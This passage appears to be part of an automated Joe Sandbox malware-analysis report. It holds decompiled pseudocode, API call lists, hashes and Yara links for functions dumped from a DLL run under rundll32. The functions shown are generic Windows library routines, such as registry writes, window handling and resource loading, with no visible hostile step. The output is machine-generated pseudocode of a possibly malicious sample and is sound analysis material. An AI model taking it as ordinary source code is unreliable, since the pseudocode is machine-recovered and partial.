					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E10011A49(_t19, _v8);
			}

0x1002606c
0x10026072
0x10026078
0x1002607b
0x100260bf
0x100260d5
0x1002607d
0x10026085
0x10026089
0x1002609a
0x100260a3
0x100260ad
0x100260b0
0x10026089
0x100260e5

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002609A
RegCloseKey.ADVAPI32(00000000,?,?), ref: 100260A3
wsprintfA.USER32 ref: 100260BF
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 100260D5

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: 1030caaca5fed2ec1b505a2b2ed5fcbae2776b8ec4336b20fd1a7f330d113955
Instruction ID: dbd3dcef2f50a9cfde67fe85f818d911aed70fdcf0d319bd2de0a1eb1e9519d6
Opcode Fuzzy Hash: 1030caaca5fed2ec1b505a2b2ed5fcbae2776b8ec4336b20fd1a7f330d113955
Instruction Fuzzy Hash: A801713240062AFBDB21DFA4DC89E9F3BB8FF08754F504025FA05AA150EB70DA12DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10020D7C Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10020D7C(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = GetDlgItem(_a4, _a8);
				if(_t14 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t15 = _t10;
						if(_t15 == 0) {
							goto L10;
						}
						_t10 = E10020D7C(_t15, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t15, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t14) == 0) {
						L3:
						_push(_t14);
						if(_a12 == 0) {
							return E10020A8C(_t16);
						}
						_t10 = E10020AB3();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10020D7C(_t14, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 10020D87
GetTopWindow.USER32(00000000), ref: 10020D9A

Part of subcall function 10020D7C: GetWindow.USER32(00000000,00000002), ref: 10020DE1

GetTopWindow.USER32(?), ref: 10020DCA

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 21f74a113946cd527e76639aa47c53ad8dc2fd7a2a48c2c54bdf829808e45900
Instruction ID: 9d45a5eaf833e8342ea8658b8fc51275725192d96523c4fe16453540544cdebd
Opcode Fuzzy Hash: 21f74a113946cd527e76639aa47c53ad8dc2fd7a2a48c2c54bdf829808e45900
Instruction Fuzzy Hash: 5C014F36103B66A7DB12EFA1EC00F8E3A9AEF05294FD64011FD0055123DB31E9119A91

Uniqueness

Uniqueness Score: -1.00%

Function 1002883A Relevance: 6.0, APIs: 4, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002883A(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}

0x1002883c
0x10028845
0x1002884e
0x1002885e
0x10028864
0x10028868
0x1002886c
0x10028878
0x10028881
0x00000000
0x10028888
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 1002884E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,100297B4,00000000), ref: 10028864
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002886C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,100297B4,00000000), ref: 10028881

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 3c7747a0fdd51894c554270352cc45aff2ebdffdadcce74c0e3214a9369f9261
Instruction ID: d1c89f159441746b2e07e270c4f99bc264b0d46c7cbe9379866ddbcf631a71b3
Opcode Fuzzy Hash: 3c7747a0fdd51894c554270352cc45aff2ebdffdadcce74c0e3214a9369f9261
Instruction Fuzzy Hash: 88F03A76107639BFA2209B669C8CCAFBF9CEE8B2A5B11452AF54982110C6315901CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C392 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000C392(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}

0x1000c39d
0x1000c3a0
0x1000c3c3
0x1000c3d0
0x1000c3a2
0x1000c3ad
0x1000c3ae
0x1000c3af
0x1000c3b0
0x1000c3b2
0x1000c3e2
0x1000c3f7
0x1000c3f7
0x1000c401

APIs

IntersectRect.USER32 ref: 1000C3C3
EqualRect.USER32 ref: 1000C3D0
IsRectEmpty.USER32 ref: 1000C3DA
InvalidateRect.USER32(?,?,?), ref: 1000C3F7

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: f0ed8b48114fb23be77498269367ff93e0a3b894fe797463903eab2dbd989ea5
Instruction ID: 9159c987aa2d5a5aeeee2be08ce2a62d7413ba657a27a741624aa30df7b12500
Opcode Fuzzy Hash: f0ed8b48114fb23be77498269367ff93e0a3b894fe797463903eab2dbd989ea5
Instruction Fuzzy Hash: CC010C3191021EABEF01DFA4CC88EAA77BDFF08354F008465F91496115D271E6068B60

Uniqueness

Uniqueness Score: -1.00%

Function 100226EB Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100226EB(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E10021850(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E10027747() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002270D
LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EF92,?,?,1000658A), ref: 10022719
LockResource.KERNEL32(00000000,?,?,?,?,1001EF92,?,?,1000658A), ref: 10022726
FreeResource.KERNEL32(00000000,?,?,?,?,1001EF92,?,?,1000658A), ref: 10022741

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 3a29dd8cbd6d72f89d273518e8fd5abda38e5c7998f2d129a3dcfe3df708c639
Instruction ID: 0b52cf9b356d3f5d4ba4559ec291a070f78181d08af1efc45dcf1bf1b7ff762e
Opcode Fuzzy Hash: 3a29dd8cbd6d72f89d273518e8fd5abda38e5c7998f2d129a3dcfe3df708c639
Instruction Fuzzy Hash: 2CF0963A209611BBD3419BA55CC8A7FB6BDEF856E1B510039FD08D2211DE309C06C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 1001E9BA Relevance: 6.0, APIs: 4, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001E9BA(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				intOrPtr _t14;
				int _t15;
				intOrPtr _t28;
				void* _t30;

				_t30 = __ecx;
				_t14 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t14 == 0) {
					if(_a4 == 0) {
						_t28 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t28 + 0x1c)) {
							SendMessageA( *(E10020A8C(__ebp, GetParent( *(_t28 + 0x1c))) + 0x1c), 0x28, 0, 0);
						}
					}
					_t15 = E10022B0F( *((intOrPtr*)(_t30 + 0x14)), _a4);
					L8:
					 *((intOrPtr*)(_t30 + 0x18)) = 1;
					return _t15;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					asm("sbb ecx, ecx");
					_t15 = EnableMenuItem( *(_t14 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
					goto L8;
				}
				return _t14;
			}

APIs

EnableMenuItem.USER32 ref: 1001E9E5
GetFocus.USER32 ref: 1001E9F8
GetParent.USER32(?), ref: 1001EA06
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1001EA1B

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnableFocusItemMenuMessageParentSend
String ID:
API String ID: 2297321873-0
Opcode ID: f5826bd03a1017b66a7141d6917d7c0c41881ba600cb9822856f305d40dfd7da
Instruction ID: a68035344e1a35b3cc5600f124cb7325eea486401607c6a04fb7d247c7f80c17
Opcode Fuzzy Hash: f5826bd03a1017b66a7141d6917d7c0c41881ba600cb9822856f305d40dfd7da
Instruction Fuzzy Hash: C7015630510A02ABE729DF24DC8AB5ABBF5FF40721F618A19F242965E1CB70FC85CA51

Uniqueness

Uniqueness Score: -1.00%

Function 10023080 Relevance: 6.0, APIs: 4, Instructions: 40
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10023080(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011A8C(E1002A99F, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E1002320B())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E10002EB0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}

0x10023085
0x1002308a
0x10023092
0x100230b4
0x100230bc
0x100230c3
0x100230c4
0x100230d3
0x100230dc
0x100230ea
0x100230ef
0x10023094
0x1002309d
0x1002309d
0x100230f5
0x100230fd

APIs

__EH_prolog.LIBCMT ref: 10023085
GetWindowTextA.USER32 ref: 1002309D
lstrcpynA.KERNEL32(?,?,?), ref: 100230D3
lstrlenA.KERNEL32(?), ref: 100230DC

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prologTextWindowlstrcpynlstrlen
String ID:
API String ID: 3022380644-0
Opcode ID: 7131124630a9dfe8a6b2c307b208c6c12adeaedec208938fd2302da43044b269
Instruction ID: 59e866b8c914197c7af95b43c0e78dc9f411df53cb9001daccb1174aff142d08
Opcode Fuzzy Hash: 7131124630a9dfe8a6b2c307b208c6c12adeaedec208938fd2302da43044b269
Instruction Fuzzy Hash: DC015A36910624EFDB15DFA8C848BAEBBB1FF08310F44C659F5229B261CB71A954DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001BA03 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001BA03(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B9E2( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B9E2( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B9E2( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B9E2( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}

0x1001ba04
0x1001ba09
0x1001ba12
0x1001ba17
0x1001ba1c
0x1001ba1e
0x1001ba26
0x1001ba2b
0x1001ba30
0x1001ba32
0x1001ba32
0x1001ba30
0x1001ba35
0x1001ba48
0x1001ba4a
0x1001ba4a
0x1001ba4d
0x1001ba60

APIs

___addl.LIBCMT ref: 1001BA12
___addl.LIBCMT ref: 1001BA26
___addl.LIBCMT ref: 1001BA3E
___addl.LIBCMT ref: 1001BA56

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: c078f337c12ced7b52d7d91989df3d54b5648189412cefbb7d1529b08b21fb15
Instruction ID: 96e5a750fa877066d70bb02f8032130ad55ec3bb9e9b289922908bb5b81f5c31
Opcode Fuzzy Hash: c078f337c12ced7b52d7d91989df3d54b5648189412cefbb7d1529b08b21fb15
Instruction Fuzzy Hash: 8BF06276400902AFDA10CE41DC02E56B7E9FF54240B144465FE5886032EB32E9A9CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10025266 Relevance: 6.0, APIs: 4, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10025266(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x100371f4; // 0x82d1d2ba
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E10011A49(_t13, _v8);
			}

0x1002526f
0x10025278
0x10025281
0x1002528a
0x100252bb
0x100252bb
0x100252cb

APIs

lstrlenA.KERNEL32(?), ref: 1002527B
GetWindowTextA.USER32 ref: 10025297
lstrcmpA.KERNEL32(?,?), ref: 100252AB
SetWindowTextA.USER32(?,?), ref: 100252BB

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: bcb51eb4c827628d45581d86a1f59c2a831258b7d0252f24e85ddb6bb5900f65
Instruction ID: 53953f2b7f923e2f6065e864dc59350dabd8a53405bc7f9d7020dd2e02fa78f9
Opcode Fuzzy Hash: bcb51eb4c827628d45581d86a1f59c2a831258b7d0252f24e85ddb6bb5900f65
Instruction Fuzzy Hash: CDF04975900228EBDF11EF64CD88ACD7BADFB05395F008061F945D6260E7718E99DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001F3D8 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F3D8() {
				intOrPtr _t17;
				struct HWND__* _t19;
				intOrPtr* _t28;
				void* _t30;

				_t28 =  *((intOrPtr*)(_t30 - 0x1c));
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t30 - 0x20)) != 0) {
					EnableWindow( *(_t30 - 0x14), 1);
				}
				if( *(_t30 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t36 = _t19 -  *((intOrPtr*)(_t28 + 0x1c));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x1c))) {
						SetActiveWindow( *(_t30 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1001EE35(_t28, _t36);
				if( *((intOrPtr*)(_t28 + 0x54)) != 0) {
					FreeResource( *(_t30 - 0x18));
				}
				_t17 =  *((intOrPtr*)(_t28 + 0x40));
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t17;
			}

APIs

EnableWindow.USER32(00000000,00000001), ref: 1001F3EB
GetActiveWindow.USER32 ref: 1001F3F6
SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F404
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F420

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Active$EnableFreeResource
String ID:
API String ID: 3751187028-0
Opcode ID: 020197bcd5d6460521301feed9d81b622fa1f6ed979486cfcfeeb4a14319daad
Instruction ID: 95538fb97461d96b47ade885aede959c10695171be7e2c0cf9a2fc55756b8812
Opcode Fuzzy Hash: 020197bcd5d6460521301feed9d81b622fa1f6ed979486cfcfeeb4a14319daad
Instruction Fuzzy Hash: 95F04F35900A55CFCF21EF94C9C55AEB7F1FF18311B20456DE112B62A0CB359D46CB11

Uniqueness

Uniqueness Score: -1.00%

Function 100289F2 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E100289F2(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;

				_t10 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x1003a108;
					if( *0x1003a108 == 0) {
						_t5 = GetTickCount();
						 *0x1003a108 =  *0x1003a108 + 1;
						__eflags =  *0x1003a108;
						 *0x100370ac = _t5;
					}
					_t4 = GetTickCount() -  *0x100370ac;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100370ac = _t4;
					}
					return _t4;
				}
				return E1002899B(_t10, _a8);
			}

APIs

GetTickCount.KERNEL32 ref: 10028A14
GetTickCount.KERNEL32 ref: 10028A21
CoFreeUnusedLibraries.OLE32 ref: 10028A30
GetTickCount.KERNEL32 ref: 10028A36

Part of subcall function 1002899B: CoFreeUnusedLibraries.OLE32(00000000,10028A7B,00000000,?,?,1000CDA9), ref: 100289DF
Part of subcall function 1002899B: OleUninitialize.OLE32(?,?,1000CDA9), ref: 100289E5

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 9f075085ac1902155813612b68f1517be82116e0a00c831b35725488cafaff21
Instruction ID: cbbec42d6035b90aecf89428aa475ad3b10146c3bd0bbde74679eacd634a22b6
Opcode Fuzzy Hash: 9f075085ac1902155813612b68f1517be82116e0a00c831b35725488cafaff21
Instruction Fuzzy Hash: CCE0E53480A234DEF366EB64DC8421A3AE0FB05350F518427F4849A062CB7469D1CF62

Uniqueness

Uniqueness Score: -1.00%

Function 10012649 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E10012649(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x100371f4; // 0x82d1d2ba
				_v8 = _t42;
				if(GetCPInfo( *0x1003b924,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x1003b940) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x1003b821) =  *(_t45 + 0x1003b821) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x1003b821) =  *(_t45 + 0x1003b821) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x1003b940) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x1003b808);
					_push( *0x1003b924);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E10018622(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x1003b924);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x1003b808);
					E10018266(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x1003b924);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x1003b808);
					E10018266(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
